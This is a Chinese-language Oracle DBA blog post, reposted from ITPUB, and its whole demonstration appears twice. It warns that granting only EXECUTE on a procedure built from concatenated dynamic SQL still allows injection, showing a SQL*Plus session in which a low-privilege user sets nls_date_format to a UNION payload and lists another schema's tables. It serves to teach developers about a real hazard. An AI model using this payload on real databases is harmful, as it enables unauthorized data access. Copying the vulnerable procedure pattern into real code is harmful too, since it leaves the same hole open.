今天看tom的有提到一个很有趣的东东,只授权的procedure execute,别人就可以sql注入,以后你可得小心了,下面请看我的试验
[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- -------------------
ZYY 1099 2011-08-30 11:41:03
GZPX_DB 1070 2011-08-30 11:41:01
GIAF 1069 2011-08-30 11:41:01
DEAN_TRAIN 1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME TABTYPE CLUSTERID
------------------------------ ------- ----------
TEST TABLE
TESTA TABLE
TESTB TABLE
TESTBLOB TABLE
TESTC TABLE
TESTIMG TABLE
TESTKDR TABLE
TESTXY TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
2 as
3 l_rec all_users%rowtype;
4 c sys_refcursor;
5 l_query long;
6 begin
7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';
8 dbms_output.put_line( l_query );
9 open c for l_query;
10 for i in 1 .. 10
11 loop
12 fetch c into l_rec;
13 exit when c%notfound;
14 dbms_output.put_line( l_rec.username || '.....' );
15 end loop;
16 close c;
17 end;
18 /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
呵,是不是很眼熟,这当然是anbob的表,这些表并没有授权给icme。同样也可以从all_column得到列,那样就可以得到表只的一部份数据了...
[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- -------------------
ZYY 1099 2011-08-30 11:41:03
GZPX_DB 1070 2011-08-30 11:41:01
GIAF 1069 2011-08-30 11:41:01
DEAN_TRAIN 1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME TABTYPE CLUSTERID
------------------------------ ------- ----------
TEST TABLE
TESTA TABLE
TESTB TABLE
TESTBLOB TABLE
TESTC TABLE
TESTIMG TABLE
TESTKDR TABLE
TESTXY TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
2 as
3 l_rec all_users%rowtype;
4 c sys_refcursor;
5 l_query long;
6 begin
7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';
8 dbms_output.put_line( l_query );
9 open c for l_query;
10 for i in 1 .. 10
11 loop
12 fetch c into l_rec;
13 exit when c%notfound;
14 dbms_output.put_line( l_rec.username || '.....' );
15 end loop;
16 close c;
17 end;
18 /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
呵,是不是很眼熟,这当然是anbob的表,这些表并没有授权给icme。同样也可以从all_column得到列,那样就可以得到表只的一部份数据了...
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/23368118/viewspace-706301/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/23368118/viewspace-706301/
133
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
